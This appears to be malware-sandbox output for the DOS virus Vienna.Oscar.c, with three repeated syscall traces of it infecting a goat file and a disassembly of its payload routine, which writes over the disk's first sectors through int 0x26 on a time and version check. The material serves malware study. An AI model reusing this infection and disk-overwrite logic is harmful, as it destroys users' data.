Sample viewer

vx.netlux.org/Virus.DOS.Vienna.Oscar.c

Syscalls:

Time Syscall Op PC | Syscall Name
2018-12-17T22:54:28.118861435Z 48 PC: 12ba6 | Get DOS version
2018-12-17T22:54:28.120263949Z 47 PC: 12bb2 | Get disk transfer address
2018-12-17T22:54:28.123155779Z 26 PC: 12bc1 | Set disk transfer address
2018-12-17T22:54:28.124333576Z 78 PC: 12c44 | Find first file
2018-12-17T22:54:28.131098186Z 67 PC: 12c7c | Get or set file attributes
2018-12-17T22:54:28.138765354Z 67 PC: 12c8c | Get or set file attributes
2018-12-17T22:54:28.156524343Z 61 PC: 12c96 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:54:28.163892623Z 87 PC: 12ca2 | Get or set file date and time
2018-12-17T22:54:28.173906877Z 44 PC: 12cac | Get time
Disassembly at 0x12cac:
0x12cac: cmp dh, 0xa
0x12caf: jne 0x12cd6
0x12cb1: mov ah, 0x30
0x12cb3: int 0x21
0x12cb5: cmp al, 4
0x12cb7: jl 0x12cbc
0x12cb9: jmp 0x12d37
0x12cbb: nop
0x12cbc: mov al, 2
0x12cbe: mov cx, 9
0x12cc1: mov dx, 0
0x12cc4: mov bx, si
0x12cc6: sub bx, 0x10
0x12cc9: push bp
0x12cca: int 0x26
0x12ccc: jb 0x12cd2
0x12cce: xor ax, ax
0x12cd0: jmp 0x12d37
0x12cd2: pop bx
0x12cd3: pop bp

2018-12-17T22:54:28.17626992Z 63 PC: 12ce2 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:54:28.183840724Z 66 PC: 12cf4 | Move file pointer
2018-12-17T22:54:28.210681719Z 64 PC: 12d17 | Write file or device (Write 648 bytes on handle 5)
2018-12-17T22:54:28.221134122Z 66 PC: 12d29 | Move file pointer
2018-12-17T22:54:28.223141379Z 64 PC: 12d37 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:54:28.231839868Z 87 PC: 12d48 | Get or set file date and time
2018-12-17T22:54:28.233729612Z 62 PC: 12d4c | Close file
2018-12-17T22:54:28.242586536Z 67 PC: 12d59 | Get or set file attributes
2018-12-17T22:54:28.259342474Z 26 PC: 12d63 | Set disk transfer address
2018-12-17T22:54:28.260727473Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-17T22:54:28.265456008Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":10,"TimeBased":true,"OriginalID":11563,"SideJobID":0}

Syscalls:

Time Syscall Op PC | Syscall Name
2018-12-25T12:30:50.714206438Z 48 PC: 12ba6 | Get DOS version
2018-12-25T12:30:50.715623579Z 47 PC: 12bb2 | Get disk transfer address
2018-12-25T12:30:50.716685135Z 26 PC: 12bc1 | Set disk transfer address
2018-12-25T12:30:50.717565966Z 78 PC: 12c44 | Find first file
2018-12-25T12:30:50.721387978Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:30:50.725262747Z 67 PC: 12c8c | Get or set file attributes
2018-12-25T12:30:50.739502185Z 61 PC: 12c96 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:50.751316751Z 87 PC: 12ca2 | Get or set file date and time
2018-12-25T12:30:50.753607061Z 44 PC: 12cac | Get time
Disassembly at 0x12cac:
0x12cac: cmp dh, 0xa
0x12caf: jne 0x12cd6
0x12cb1: mov ah, 0x30
0x12cb3: int 0x21
0x12cb5: cmp al, 4
0x12cb7: jl 0x12cbc
0x12cb9: jmp 0x12d37
0x12cbb: nop
0x12cbc: mov al, 2
0x12cbe: mov cx, 9
0x12cc1: mov dx, 0
0x12cc4: mov bx, si
0x12cc6: sub bx, 0x10
0x12cc9: push bp
0x12cca: int 0x26
0x12ccc: jb 0x12cd2
0x12cce: xor ax, ax
0x12cd0: jmp 0x12d37
0x12cd2: pop bx
0x12cd3: pop bp

2018-12-25T12:30:50.756104647Z 63 PC: 12ce2 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:50.762746104Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:30:50.765422228Z 64 PC: 12d17 | Write file or device (Write 648 bytes on handle 5)
2018-12-25T12:30:50.773499676Z 66 PC: 12d29 | Move file pointer
2018-12-25T12:30:50.774704831Z 64 PC: 12d37 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:50.77939129Z 87 PC: 12d48 | Get or set file date and time
2018-12-25T12:30:50.780565524Z 62 PC: 12d4c | Close file
2018-12-25T12:30:50.785548378Z 67 PC: 12d59 | Get or set file attributes
2018-12-25T12:30:50.88938781Z 26 PC: 12d63 | Set disk transfer address
2018-12-25T12:30:50.890804002Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:30:50.894502436Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11563,"SideJobID":0}

Syscalls:

Time Syscall Op PC | Syscall Name
2018-12-25T12:30:50.834929294Z 48 PC: 12ba6 | Get DOS version
2018-12-25T12:30:50.836255748Z 47 PC: 12bb2 | Get disk transfer address
2018-12-25T12:30:50.838579068Z 26 PC: 12bc1 | Set disk transfer address
2018-12-25T12:30:50.840453734Z 78 PC: 12c44 | Find first file
2018-12-25T12:30:50.847707127Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:30:50.855202168Z 67 PC: 12c8c | Get or set file attributes
2018-12-25T12:30:50.872647352Z 61 PC: 12c96 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:50.880388173Z 87 PC: 12ca2 | Get or set file date and time
2018-12-25T12:30:50.883612546Z 44 PC: 12cac | Get time
Disassembly at 0x12cac:
0x12cac: cmp dh, 0xa
0x12caf: jne 0x12cd6
0x12cb1: mov ah, 0x30
0x12cb3: int 0x21
0x12cb5: cmp al, 4
0x12cb7: jl 0x12cbc
0x12cb9: jmp 0x12d37
0x12cbb: nop
0x12cbc: mov al, 2
0x12cbe: mov cx, 9
0x12cc1: mov dx, 0
0x12cc4: mov bx, si
0x12cc6: sub bx, 0x10
0x12cc9: push bp
0x12cca: int 0x26
0x12ccc: jb 0x12cd2
0x12cce: xor ax, ax
0x12cd0: jmp 0x12d37
0x12cd2: pop bx
0x12cd3: pop bp

2018-12-25T12:30:50.886908718Z 63 PC: 12ce2 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:50.893911329Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:30:50.89598946Z 64 PC: 12d17 | Write file or device (Write 648 bytes on handle 5)
2018-12-25T12:30:50.921590138Z 66 PC: 12d29 | Move file pointer
2018-12-25T12:30:50.923156454Z 64 PC: 12d37 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:50.930455988Z 87 PC: 12d48 | Get or set file date and time
2018-12-25T12:30:50.932617411Z 62 PC: 12d4c | Close file
2018-12-25T12:30:50.941319713Z 67 PC: 12d59 | Get or set file attributes
2018-12-25T12:30:50.952434346Z 26 PC: 12d63 | Set disk transfer address
2018-12-25T12:30:50.954706691Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:30:50.961265143Z 76 PC: 12a86 | Terminate with return code (Return code = '36')